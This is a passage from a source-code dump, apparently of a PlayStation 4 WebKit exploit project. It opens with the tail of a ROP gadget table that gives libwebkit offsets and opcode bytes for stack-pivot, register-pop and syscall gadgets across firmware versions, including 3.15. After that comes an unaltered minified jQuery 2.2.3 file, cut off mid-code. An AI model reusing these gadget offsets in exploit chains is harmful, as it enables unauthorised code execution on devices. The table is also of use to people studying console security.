19 |         'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(LIBWEBKIT, 0xd5d771, [0x48, 0x94, 0xFF, 0x48, 0x89]),
20 |         'pop rcx; pop rcx': new gadget(LIBWEBKIT, 0x2017594, [0x59, 0x59]),
21 |         'pop rcx': new gadget(LIBWEBKIT, 0x3ca9fd, [0x59]),
22 |         'add dword ptr [rax - 0x77], ecx': new gadget(LIBWEBKIT, 0x55ac, [0x01, 0x48, 0x89]),
23 |         'pop rdi': new gadget(LIBWEBKIT, 0x113991, [0x5f]),
24 |         'mov qword ptr [rdi], rax': new gadget(LIBWEBKIT, 0x11fc37, [0x48, 0x89, 0x07]),
25 |         'pop rsi': new gadget(LIBWEBKIT, 0xb9ebb, [0x5E]),
26 |         'pop rdx': new gadget(LIBWEBKIT, 0x1afa, [0x5A]),
27 |         'pop rax': new gadget(LIBWEBKIT, 0x1c6ab, [0x58]),
28 |         'syscall': new gadget(LIBWEBKIT, 0x1ca1b28, [0x0F, 0x05]),
29 |         'pop rsp': new gadget(LIBWEBKIT, 0x376850, [0x5C]),
30 |         'mov rax, qword ptr [rax]': new gadget(LIBWEBKIT, 0x4add2, [0x48, 0x8B, 0x00]),
31 |         'pop r8': new gadget(LIBWEBKIT, 0x4c12ed, [0x41, 0x58]),
32 |         'pop r9': new gadget(LIBWEBKIT, 0xee09bf, [0x47, 0x59]) // note: this is actually "rex.RXB pop r9"
33 |     },
34 |     'PlayStation 4 3.15': {
35 |         'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, 0x00148dfb - ((0x50000 * 4) * 26), [0x48, 0x94, 0xFF, 0x48, 0x89]),
36 |         'pop rcx; pop rcx': new gadget(VTABLE, 0x0016c49c - (((0x50000 * 4) * 26) - (1572864 * (10 + 6))), [0x59, 0x59]),
37 |         'pop rcx': new gadget(VTABLE, 0x0007662b - ((0x50000 * 4) * 26), [0x59]),
38 |         'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, 0x00001279 - ((0x50000 * 4) * 26), [0x01, 0x48, 0x89]),
39 |         'pop rdi': new gadget(VTABLE, 0x000c7cdc - ((0x50000 * 4) * 26), [0x5f]),
40 |         'mov qword ptr [rdi], rax': new gadget(VTABLE, 0x0000181f - ((0x40000 * 4) * 26), [0x48, 0x89, 0x07]),
41 |         'pop rsi': new gadget(VTABLE, 0x000a08c6 - ((0x50000 * 4) * 26), [0x5E]),
42 |         'pop rdx': new gadget(VTABLE, 0x0000832b - ((0x40000 * 4) * 26), [0x5A]),
43 |         'pop rax': new gadget(VTABLE, 0x0002ea47 - ((0x50000 * 4) * 26), [0x58]),
44 |         'syscall': new gadget(LIBWEBKIT, 0x000777b0 + 1572864 * 18, [0x0F, 0x05]),
45 |         'pop rsp': new gadget(VTABLE, 0x00029f5d - ((0x50000 * 4) * 26), [0x5C]),
46 |         'mov rax, qword ptr [rax]': new gadget(VTABLE, 0x00064214 - ((0x50000 * 4) * 26), [0x48, 0x8B, 0x00]),
47 |         'pop r8': new gadget(LIBWEBKIT, 0x0008c9b6, [0x47, 0x58]),
48 |         'pop r9': new gadget(LIBWEBKIT, 0x0012f5b7 + 1572864 * 6, [0x47, 0x59]),
49 |     }
50 | }
51 | 


--------------------------------------------------------------------------------
/scripts/jquery.min.js:
--------------------------------------------------------------------------------
1 | /*! jQuery v2.2.3 | (c) jQuery Foundation | jquery.org/license */
2 | !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.3",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?i[j.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b||this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){i["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=!!a&&"length"in a&&a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ga(),z=ga(),A=ga(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-1},K="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",L="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,"+L+"*"),S=new RegExp("^"+L+"*([>+~]|"+L+")"+L+"*"),T=new RegExp("="+L+"*([^\\]'\"]*?)"+L+"*\\]","g"),U=new RegExp(O),V=new RegExp("^"+M+"$"),W={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),TAG:new RegExp("^("+M+"|[*])"),ATTR:new RegExp("^"+N),PSEUDO:new RegExp("^"+O),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+L+"*(even|odd|(([+-]|)(\\d*)n|)"+L+"*(?:([+-]|)"+L+"*(\\d+)|))"+L+"*\\)|)","i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+L+"*((?:-\\d)?\\d*)"+L+"*\\)|)(?=[^-]|$)","i")},X=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Z=/^[^{]+\{\s*\[native \w/,$=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,_=/[+~]/,aa=/'|\\/g,ba=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),ca=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},da=function(){m()};try{H.apply(E=I.call(v.childNodes),v.childNodes),E[v.childNodes.length].nodeType}catch(ea){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==x&&(o=$.exec(a)))if(f=o[1]){if(9===x){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(w&&(j=w.getElementById(f))&&t(b,j)&&j.id===f)return d.push(j),d}else{if(o[2])return H.apply(d,b.getElementsByTagName(a)),d;if((f=o[3])&&c.getElementsByClassName&&b.getElementsByClassName)return H.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==x)w=b,s=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(aa,"\\$&"):b.setAttribute("id",k=u),r=g(a),h=r.length,l=V.test(k)?"#"+k:"[id='"+k+"']";while(h--)r[h]=l+" "+qa(r[h]);s=r.join(","),w=_.test(a)&&oa(b.parentNode)||b}if(s)try{return H.apply(d,w.querySelectorAll(s)),d}catch(y){}finally{k===u&&b.removeAttribute("id")}}}return i(a.replace(Q,"$1"),b,d,e)}function ga(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ha(a){return a[u]=!0,a}function ia(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function ja(a,b){var c=a.split("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function ma(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function na(a){return ha(function(b){return b=+b,ha(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function oa(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=fa.support={},f=fa.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fa.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventListener("unload",da,!1):e.attachEvent&&e.attachEvent("onunload",da)),c.attributes=ia(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ia(function(a){return a.appendChild(n.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=Z.test(n.getElementsByClassName),c.getById=ia(function(a){return o.appendChild(a).id=u,!n.getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return"undefined"!=typeof b.getElementsByClassName&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=Z.test(n.querySelectorAll))&&(ia(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\r\\' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+L+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+L+"*(?:value|"+K+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=Z.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ia(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",O)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=Z.test(o.compareDocumentPosition),t=b||Z.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===n||a.ownerDocument===v&&t(v,a)?-1:b===n||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},fa.matches=function(a,b){return fa(a,null,null,b)},fa.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(T,"='$1']"),c.matchesSelector&&p&&!A[b+" "]&&(!r||!r.test(b))&&(!q||!q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fa(b,n,null,[a]).length>0},fa.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fa.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fa.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fa.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fa.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fa.selectors={cacheLength:50,createPseudo:ha,match:W,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(ba,ca),a[3]=(a[3]||a[4]||a[5]||"").replace(ba,ca),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fa.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fa.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return W.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&U.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(ba,ca).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+L+")"+a+"("+L+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fa.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(P," ")+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h,t=!1;if(q){if(f){while(p){m=b;while(m=m[p])if(h?m.nodeName.toLowerCase()===r:1===m.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){m=q,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if((h?m.nodeName.toLowerCase()===r:1===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fa.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ha(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ha(function(a){var b=[],c=[],d=h(a.replace(Q,"$1"));return d[u]?ha(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ha(function(a){return function(b){return fa(a,b).length>0}}),contains:ha(function(a){return a=a.replace(ba,ca),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ha(function(a){return V.test(a||"")||fa.error("unsupported lang: "+a),a=a.replace(ba,ca).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Y.test(a.nodeName)},input:function(a){return X.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:na(function(){return[0]}),last:na(function(a,b){return[b-1]}),eq:na(function(a,b,c){return[0>c?c+b:c]}),even:na(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:na(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:na(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:na(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=la(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=ma(b);function pa(){}pa.prototype=d.filters=d.pseudos,d.setFilters=new pa,g=fa.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){c&&!(e=R.exec(h))||(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=S.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(Q," ")}),h=h.slice(c.length));for(g in d.filter)!(e=W[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?fa.error(a):z(a,i).slice(0)};function qa(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function ra(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j,k=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(j=b[u]||(b[u]={}),i=j[b.uniqueID]||(j[b.uniqueID]={}),(h=i[d])&&h[0]===w&&h[1]===f)return k[2]=h[2];if(i[d]=k,k[2]=a(b,c,g))return!0}}}function sa(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function ta(a,b,c){for(var d=0,e=b.length;e>d;d++)fa(a,b[d],c);return c}function ua(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(c&&!c(f,d,e)||(g.push(f),j&&b.push(h)));return g}function va(a,b,c,d,e,f){return d&&!d[u]&&(d=va(d)),e&&!e[u]&&(e=va(e,f)),ha(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||ta(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ua(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ua(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?J(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ua(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):H.apply(g,r)})}function wa(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=ra(function(a){return a===b},h,!0),l=ra(function(a){return J(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];f>i;i++)if(c=d.relative[a[i].type])m=[ra(sa(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return va(i>1&&sa(m),i>1&&qa(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(Q,"$1"),c,e>i&&wa(a.slice(i,e)),f>e&&wa(a=a.slice(e)),f>e&&qa(a))}m.push(c)}return sa(m)}function xa(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,o,q,r=0,s="0",t=f&&[],u=[],v=j,x=f||e&&d.find.TAG("*",k),y=w+=null==v?1:Math.random()||.1,z=x.length;for(k&&(j=g===n||g||k);s!==z&&null!=(l=x[s]);s++){if(e&&l){o=0,g||l.ownerDocument===n||(m(l),h=!p);while(q=a[o++])if(q(l,g||n,h)){i.push(l);break}k&&(w=y)}c&&((l=!q&&l)&&r--,f&&t.push(l))}if(r+=s,c&&s!==r){o=0;while(q=b[o++])q(t,u,g,h);if(f){if(r>0)while(s--)t[s]||u[s]||(u[s]=F.call(i));u=ua(u)}H.apply(i,u),k&&!f&&u.length>0&&r+b.length>1&&fa.uniqueSort(i)}return k&&(w=y,j=v),t};return c?ha(f):f}return h=fa.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wa(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xa(e,d)),f.selector=a}return f},i=fa.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(ba,ca),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=W.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(ba,ca),_.test(j[0].type)&&oa(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qa(j),!a)return H.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,!b||_.test(a)&&oa(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ia(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ia(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||ja("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ia(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||ja("value",function(a,b,c){return 